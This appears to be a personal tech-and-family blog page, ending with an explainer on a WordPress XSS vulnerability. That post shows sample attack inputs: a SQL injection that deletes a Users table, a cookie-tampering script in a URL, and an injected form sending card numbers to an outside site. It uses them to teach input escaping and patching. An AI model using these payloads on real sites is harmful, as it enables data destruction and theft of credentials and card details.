Where Trump Language Spam Is Coming From

A few days ago, I noticed a tweet from Amy Ozten:

I decided to look at my Google Analytics to see if I was being hit with this. When I loaded the stats for my new GhostThiefNovel.com website, I saw a big spike in traffic. My first thought was “hooray! My efforts to get the word out about my novel are paying off.” Sadly, though, my traffic hadn’t spiked all that much. Instead, my Ghost Thief site was being hit with the very Language Spam that Amy Oztan was talking about.

Needless to say, this upset me a bit. And when I’m upset, I tend to do what I always fall back on…

Collecting data.

(What? Everyone doesn’t collect data when they’re upset?)

I checked some other sites I manage and sure enough many of those were hit with the language spam just like my Ghost Thief site was. Thankfully, I was able to create a Google Analytics filter to weed out the spam. It won’t block the spammers from hitting your site (something that I’m actually working on), but it will let you see your actual traffic minus the “Vote Trump” language spam. Fortunately, Google lets you share out custom built filters (they call them segments), so click here to add it to your Google Analytics.

Next, I started to wonder where all this language spam was coming from. Was this spread out all over or was it localized in one region? I went through all of the sites whose Google Analytics I have access to and put together a spreadsheet. The results were obvious right from the start. There was a large array of countries that the spam was coming from including France, Japan, Hungary, and even the United States. By far, though, Russia accounted for the most language spam traffic. Russia’s share was 98.4% of the traffic. The closest countries – the United States and Ukraine – were tied at 0.19% each.

Put in a graph:

LanguageSpamOrgins

 

What’s the takeaway from this? Well, Russian hackers have been in the news a lot, so it’s tempting to bring them up and try to link these two topics. I don’t think they are linked – except in the sense of Internet “bad guys” coming from Russia. Also, it’s tempting to just say “Block all traffic from Russia,” but valid traffic can come from there as well. If your target audience is localized enough, blocking a whole country might work, but this definitely isn’t the right solution for most people. Instead, for now, use the Google Analytics filter to get your real traffic numbers and stay tuned as I work on my “anti-language spam” Google plugin.

 

Oh, and check out my book’s website. It’d be nice for the numbers to spike because of real traffic and not because of some spammers.

Novel Creativity

I feel like I’ve been ignoring this blog.

*Checks last post date*

Yes, yes I have.

I swear that this wasn’t intentional. As you might know from my posts and many tweets about it, I’ve been writing a novel. Now, I know that I have a bad habit of not completing personal projects because I had another good idea. I didn’t want this to happen with my novel. I didn’t want a great blog post idea to derail me from the excellent novel writing progress that I was making. So I focused all my creative energy on the novel.

The novel is done now. Or, at least, as done as it’s going to be for now. I’ve entered a very nerve wracking phase called “Giving The Novel To Beta Readers.” During this phase, I give copies of my text to people to read over. They will tell me if there’s a plot hole I’m missing, if the characters seem realistic enough, or if there’s a problem with the story flow.

Once I got over the nervousness of “wait, I need to let other people read this?” I was confronted by the torturer that is the waiting game. At this point, my beta readers have begun their task but haven’t had time to finish. Do they like it so far? Are they shaking their head with every word? I want to know but don’t want to pester them with twice daily e-mails asking for their opinion.

In a couple weeks, I’ll get the reports in and will likely need to make some changes to improve my story. Then it’s time to format my book for printing and get a sample copy to make sure everything looks good. Finally, my book will appear on Amazon. If everything goes well, it’ll be available in early October. (I’ll definitely post when I get a firm release date – also, if anyone is interested in doing a review, feel free to contact me.)

In the meantime, though, I can use this “novel downtime” to catch up with some blog posts I’ve wanted to do.

Thanks to all of my readers who were patient with me while my creative energies weren’t blog bound.

Saying Goodbye To 2015

goodbye-2015This past year has been an eventful one.  For better or for worse, it is coming to an end.  Our New Year’s Eve tradition is to have a "Junk Food Dinner" (mostly hors d’oeuvres) and stay up until the ball drops.  My tradition on this blog is to look back at some of my favorite posts of the year.

January

Unfortunately, I rang in the New Year with a resurgence of my post-surgery anxiety attacks.  I realized that Anxiety Is A Bully.  It tries to dictate the rules of engagement to you so that they vastly favor the anxiety and not you.  It’s important to fight back, realize what anxiety is doing, and refuse to play by its rules.

On a more serious front, the Charlie Hebdo attack led me to wonder about the Freedom To Offend and the Freedom To Be Offended.  While it might seem tempting to silence people from saying offensive things, we’ve got to protect their right to offend.  If we don’t, then someone else might take offense to something we think is important and silence us.  At the same time, people have a right to be offended and to call for there to be consequences.  If a politician says something extremely offensive to me, then it’s my right to protest and demand he be removed from office.  This doesn’t mean silencing him.  It just means balancing two different, yet related rights.  It can be tricky to navigate these waters without going too far in either direction, but it’s important that we don’t let ourselves sway too far against the offensive or against those who are offended.

Did you know I have a Zazzle store?  I didn’t.  I posted a parody of "Soft Kitty" from Big Bang Theory and then inspiration struck and I turned it into a T-Shirt.  I’m not sure if any have actually sold, but I love coming up with things like this.

February

I began February with an Extreme Geekery.  I looked into the Archimedes quote "Give me a lever long enough and I shall move the world."  Spoiler alert:  This would work, but the lever’s going to be really, really, REALLY long!  (I also had fun adding draws to my post.  I don’t do that enough.)

With a measles epidemic raging, I dove into the subject of vaccines and consequences.  My takeaway: Vaccines work.  Those who claim they cause autism or contain toxins or are worse than the diseases they prevent are ignorant at best or trying to sell you bunk at worst.  Unless you have a medical condition that precludes vaccination (e.g. some allergies or an immune system disorder), everyone should be vaccinated.  It’s a simple procedure that will save the lives of not just the vaccinated but of the people who can’t be due to age or medical issues.

We spent much of last year playing Minecraft.  I’ll admit that I haven’t picked it up much recently, but there have been many updates that my boys have shown me and I might just need to try them out myself.

March

March began with a monumental event.  We cancelled cable.  Without cable, we joined the ever growing ranks of cord cutters and got our video entertainment from a mixture of Internet-based video services (Netflix, Amazon Prime, Hulu), renting DVDs from our local library, and an OTA antenna.  I also have some new equipment that I need to set up which will let me record shows and stream videos to our TV.  We’ve been saving money every month and haven’t looked back.

We had a touching moment in a local museum.  They had an electronic drum set and NHL – who plays percussion in his band – was rocking out to it.  A set of headphones he wore kept the sound to himself.  A little girl came up to watch him play and NHL offered her his headphones.  The little girl was instantly mesmerized by the sounds NHL was producing.  Her eyes glazed over as her full attention was given to what her ears were hearing.  Then NHL gave her the drumsticks and helped show her how to make the sounds.  He willingly gave up a spot at one of his favorite exhibits so that a little girl he didn’t know could discover the wonders of drumming.  It’s a little gesture, but I was so proud of him at that moment.

April

During April, we got into some tabletop gaming with Pandemic.  We were introduced to it by a family member during Passover and had to get it ourselves.  What I love about Pandemic is that everyone works together.  There is no one winner or loser.  Either everyone wins by curing the diseases or everyone loses as the diseases ravage the world.

There was also a big WordPress vulnerability found and as people rushed to update I explained just what the vulnerability meant and how web developers usually tackle this sort of thing.

May

May was a very geeky month.  Along with Free Comic Book Day, and palindrome week, Star Wars Day meant we could play some lightsaber games.  May also saw JSL turning 8.  To wrap up the geekery, California instituting "toilet to tap" led me to wonder just how much water was in the world to drink.  It turns out that it’s a lot, but it isn’t an infinite resource.

I also wrote about Asperger’s Syndrome and how it affects neurotypical siblings.  JSL can be very patient with his brother at times, but he does have his limits and will often crave non-NHL times.

June

In June, I took some lessons from a rose bush – don’t listen to others telling you that you can’t succeed, just do your best and keep at it.

I also wrecked havoc with society by inventing instant transportation.  Ok, I just wrote about what would happen to society if someone invented it.  Given how I think it would turn out,  be thankful it’s not here.

Unfortunately, we had a crazy week when B’s mother had a heart attack and ended up in the hospital.  She’s feeling better now, but it was scary (especially for the boys who were right there when it happened).  To add insult to injury, it happened on her birthday which also happened to be the day she retired.  Everyone should know the real life symptoms of heart attacks.  (That last link isn’t one of my blog posts, but it’s important enough to bring up as often as possible.)

Thanks to then-newly-running candidate Donald Trump, I explored the true cost of web development.  Unfortunately for Trump, you can’t develop a large, complex web application that will be used nation-wide and only pay $3.  It simply cannot be done.

July

In July, New Horizons’ impending rendezvous with Pluto made me geek out about how quickly we’d be able to travel around the Earth if we could move at the speeds New Horizons was travelling at.

A tweet from The Bloggess inspired me to gather a series of 18 things that I’d tell 18 year old me.

Finally, it’s amazing how much you can get attached to a piece of furniture.  We finally got rid of our old couch.  It was hard to do, but it also was time.  The boys got to sit on it one last time as it lay on the curb awaiting pickup.  I even let them jump on it – something we never let them do when it was in our living room.

August

In August, I turned 40 years old.  Or, as I like to think of it, the 11th anniversary of my 29th birthday.  In addition, NHL turned 12.  Why won’t he stop growing up?  Why?!!!

We also began a cruising adventure to celebrate my 40th birthday.

September

In September, I shared a washy washy, happy happy, smiley smiley cruise greeting and described our incredible beach day at Norwegian’s private island.

This was also the month of me speed reading.  NHL was reading the Percy Jackson series so I decided to read them as well.  (I’ve always been a fan of Greek mythology.)  I not only tore through the first book, but the entire series (passing where NHL was).  Since then, I’ve finished Rick Riordan’s Heroes of Olympus series, his Cain trilogy, and the first book in his Asgard series.  I’ve only stopped because I’ve run out of books by him.  (Come on, Rick, get book 2 written quickly!)  I’ve also read The Bloggess’ Furiously Happy and laughed the whole way through.

October

In October, I wrote a rebuttal to someone who claimed that kids with Autism are better off when they’re bullied.  The author actually used the word "perks" to describe the results of bullying.  I’d use words like tormenting, paranoia, isolation, loneliness, and hopelessness instead to describe what happens when someone is bullied.  If you want to call those "perks" then you have a really warped definition of the word perks.

On the video gaming front, I fulfilled a lifelong desire to make Mario video games thanks to Super Mario Maker.

After picking 44.5 pounds of apples, I baked apple dishes until we were sick of apples.

Finally, I wrote up a guide to help people who wanted to explore cutting cable.

November

In November, I went through some scary Halloween decorations and an even scarier Christmas one.

I also gave a peek at what goes on in my head when I try to communicate verbally.  It’s battle on many fronts and not one I win every time.

December

December saw our Star Wars excitement build to critical mass.  Spoiler free review:  The Force Awakens was incredible.  I can’t wait to see it again.

We also celebrated B’s birthday and I had a mini-mid life crisis thanks to my Imposter Syndrome.

Finally, we had some fun with Google Cardboard.

 

It’s been a wonderful year.  Here’s hoping that 2016 will be exciting in all the right ways.

NOTE: The "Goodbye 2015" image above is based on "Fireworks Remix" by keriann3 which is available from OpenClipArt.org.

It’s Been A Crazy Week – And Not In A Good Way

ECG-heartIt’s been a crazy few weeks and, unfortunately, not in a good way.

Three weeks ago, I suddenly got a bad neck and back muscle spasm.  It hurt to move, turn my head, sit down, or get up.  I’ve gotten these before.  They usually  appear in stressful situations and disappear in a day or so.  Unfortunately, for whatever reason, the pain continued for an entire week.  Just when I would think it was gone, the pain would return and pain medication only helped a little.  The pain would even spread down my arms. One night, the pain across my body kept me up so late that it triggered a late night panic attack.  Still, as difficult as this was, it was nothing compared to the next event that turned our lives upside down.

Friday June 12th was my mother-in-law’s birthday.  It was also the day when she was retiring.  Needless to say, we went out with B’s parents for a celebratory dinner.  We ordered our food and began talking, but B’s mother kept rubbing her upper chest area – just under her neck.  She explained that her chest hurt bad.  We were worried, but she assured us that she was fine.  B began looking up some symptoms on Google while mom also noted that she felt sweaty.  She thought it was indigestion and took some medication for that, but the pain just got worse.  NHL, sitting next to her, was getting worried (as were the rest of us) and kept rubbing her back and asking if she was alright.

By the time the food came, she was pale and looked like she was going to pass out on her plate.  We finally decided that she needed to go to the hospital.  She tried to argue but we countered that we’d call 911 if she didn’t go immediately.  Besides, we would rather she go to the hospital and have it turn out to be nothing than not go and have it turn out to be something!  My father-in-law exited the booth, followed by NHL, and my mother-in-law slowly exited.  (NHL kept trying to hurry her up so she could quickly get the help that she obviously needed.)  My wife saw them out to their car while I sat at the table with the boys.

With their food served and their grandparents gone, the boys dug in.  B came back but (for obvious reasons) didn’t feel like eating.  I was worried but had the opposite reaction.  When I’m worried, I stress eat.  Even more, I wasn’t sure if we would need to run out of the restaurant so I gobbled my food down quickly.  (Given that I eat quickly to begin with, that’s saying something.)  We got B’s food and her parents’ food wrapped up to go, paid the bill, and hurried to the car.  B went to see her mother in the ER while I took the kids home to get them ready for bed.  That night, B didn’t get in until well after midnight.

The next morning, B went back to the hospital.  By this point, we knew what was going on.  My mother in law had had a heart attack.  It was a mild one, but a mild heart attack is still a heart attack.  We knew that she would be in the hospital for quite a few days as they observed her and ran tests.  Those next days went by like a blur.  B’s brother came into town to visit his mother.  I kept the boys busy while B stayed by her mother’s side.  The boys and I even visited mom in the hospital a few times.  (Since they saw her looking so weak and sick during her heart attack, we knew it would be important for them to see her feeling better even if it was in a hospital bed.)

Finally, after some confirmation that her heart was alright, she was released on Tuesday.  Of course, she’s still going to need to take it easy for a bit, but she’s already doing better.

There are a couple of lessons here.  First of all, Dr. Google can often get a bad rap.  Yes, looking up random symptoms can lead you to hypochondria or make you think you have some disease that you don’t have.  However, it can also help you discover the symptoms of something serious when you would otherwise just write it off as nothing important.  Secondly, heart attack symptoms in men differ from those in women.  The classic "movie heart attack" is a guy clutching his chest, perhaps complaining of pain in his left arm, and then collapsing on the floor.  The real life symptoms of a heart attack can include heartburn/indigestion, sweating, arm pain in either arm, toothache, and even general malaise.  Knowing the real symptoms and getting help quickly can be the difference between life and death.  Finally, never be too proud to seek help or write off your suffering as not important enough to get medical attention.  Time can be a big determining factor in the outcome of heart attacks and many other medical issues.  The quicker you get medical help, the better.

Once B’s mother was on the mend, you’d think that our lives could return to normal, but B developed a sinus infection and then an ear infection.  The pain and the antibiotics took their toll on her.  She’s still in pain and having trouble hearing out of one ear, but hopefully she is getting better.

After a month of medical issues, I’m ready for a nice, quiet, boring stretch.  Stay safe, everyone.

NOTE: The "Heart ECG Logo" above is by juliobahar and is available from OpenClipArt.org.

Why You Need To Upgrade WordPress Now (and Back It Up While You’re At It)

Last week, there was a big announcement in the WordPress world about a security vulnerability existing within many plugins.  Plugin authors scrambled to fix the issues quickly while the call went out for everyone to update their plugins and Word Press installations.  As a web developer, I understood what the vulnerability was all about, why it could be so dangerous, and what an attacker could use it to do.  As I thought about it, though, I realized that non-web developers might need a quick primer on just what the problem was.

The Problem

Word Press can be a wonderful tool for developers.  Not only is it a Content Management System, but it has a series of functions available to programmers to use in the course of writing code.  You don’t have to re-invent the wheel because Word Press has built in functions that can be used to complete the job.  A long time ago, there might have been security concerns with WordPress’s functions.  Thankfully, though, the WordPress team has put a lot of effort into security.  Unfortunately, the documentation for a couple of the functions were vague.  Developers thought that two of the functions were sanitizing the user’s input when they weren’t.

Clean That Input

What does sanitizing input mean?  It means that a developer should never trust what a user enters into a system.  If a user is prompted to enter a number between 1 and 10, it shouldn’t be assumed that they didn’t type 11.  Or abc.  Or ‘ and 1=1; Delete From Users.  If the wrong user input is blindly accepted, the program might give bad results, crash, or – even worse – allow a malicious user to run commands that could compromise the security of the server, its data, and subsequent users.  Luckily, before user input is used, it can be checked and potentially harmful contents can be neutralized.  In the case of the WordPress vulnerability, the lack of cleaning up user input meant that a Cross-Site Scripting (XSS) attack could be formed.

What is XSS?

Cross Site Scripting (or XSS) happens when malicious user input placed on a website and is used to run scripts on a user’s computer.  Suppose, a blog had a comment page that had a XSS vulnerability.  An attacker could craft a link in the form of

http://www.someblog.com/comment.php?Username=<script>document.cookie = "expires: Wed, 1 Apr 2015 12:00:00 UTC; path=/";</script>

This particular link would erase the person’s cookies – effectively logging the person out of the website.  Annoying, but ultimately harmful.  However, a more advanced form of this attack might read information stored in the cookie variables (e.g. usernames, passwords) and send them to the attacker (perhaps by using JavaScript to load an image with the data to send in the image’s link).  If the attacker sent this more advanced link to a user, he could take control of that user’s account.

Now, imagine a comment form.  The basic comment form is quite simple.  Just take the user’s comment and display it on the website.  Not hard, right?  If I input:

Very nice article.  I agree wholeheartedly.

then that should appear on the page.  What, however, should happen if I write:

Very nice article.  I agree wholeheartedly.  <form action=”http://www.somewebsite.com/”>Credit Card Number: <input type=”text” name=”CCNumber” /><input type=”submit” /></form>

Should that appear on the page as is?  In case you don’t “speak HTML”, that comment – if left unfiltered – would make a form appear on the page asking for a user’s credit card number. This phony form won’t fool anyone, of course, but a more advanced version of this could wipe out all elements on a page and display a real looking login page – with the usernames/passwords being sent to the attacker (and logging the users in if the attacker wanted to be extra sneaky).  The form could also ask for a user’s personal information or payment information – compromising the user’s credit card number or other details.

In all of these cases, the attacker uses not only the XSS vulnerability, but the trustworthiness of the website being used to fool users.  If your users usually pay for access to your website, they might not think anything is wrong when your website suddenly reports that it needs to confirm the users’ credit card numbers.

How Do I Stop XSS?

Stopping Cross-Site Scripting attacks is actually very simple.  I even had to resort to it while writing this article.  My blog post editor kept wanting to turn some of the HTML tags into actual HTML.  To keep it from doing this, I replaced all “<” angle brackets with &lt; (the HTML code for “<“) and all “>” angle brackets with &gt (the HTML code for “>”).  Doing this to user input should make the attacker’s HTML code show instead of being interpreted and run.  Of course, to do this, you need to know how to work with the code behind websites.

But What About WordPress Plugins?

When you use WordPress plugins, you need to have some level of trust as to the quality of the code.  Few users have the time (or the skill) to pour over all of the code in all of their plugins to spot all of the vulnerabilities.  The best most users can hope for is that the developers (or users with the time and skill) find the bugs and fix them.  This fixes will be posted as updated versions.  This is why it is essential to keep WordPress, its plugins, and its themes up to date.  It doesn’t matter if the vulnerability in Really Cool Plugin was fixed in version 1.3 if you’re still running version 1.2.  And don’t think you can hide behind people not knowing what version you are running.  Hackers can use automated tools to scan many sites for many different vulnerabilities – only giving their attention to the openings that they want to exploit.

How do you update?

To update your WordPress installation, log into your WordPress installation’s admin panel (usually http://www.yoursite.com/wp-admin/).  Under Dashboard on the left hand side is a menu option called “Updates.”  Clicking this leads you to a page where you can update the WordPress core installation, plugins, and themes.  (In the case of the latter, bad coding can lead to security holes within themes which might be patched with a new version of the theme.)

What about plugins with no updates?

Not every plugin author updates his plugins on a timely fashion.  Whether because he is busy on other projects or because the plugin you are using isn’t being actively developed anymore, you might still find yourself running vulnerable plugins.  Worse still, you might not know it until the plugin is exploited.  There are security plugins that can be used to mitigate the risk, but in the end one of the best defenses is a good backup.  Make sure that you have backups of your website files as well as your database.  With luck, you’ll never need them, but if you do you will be glad that you had them.

Techydad Backup & Update Service.

There are many WordPress plugins that one can use to backup ones WordPress sites.  If anyone needs any assistance, I’d like to extend an offer, though.  I’ll backup your website and database once a week as well as run monthly updates on your site for a monthly fee.  If you are interested, contact me and we can discuss pricing.

Stay safe online and happy blogging, everyone!

1 2 3 14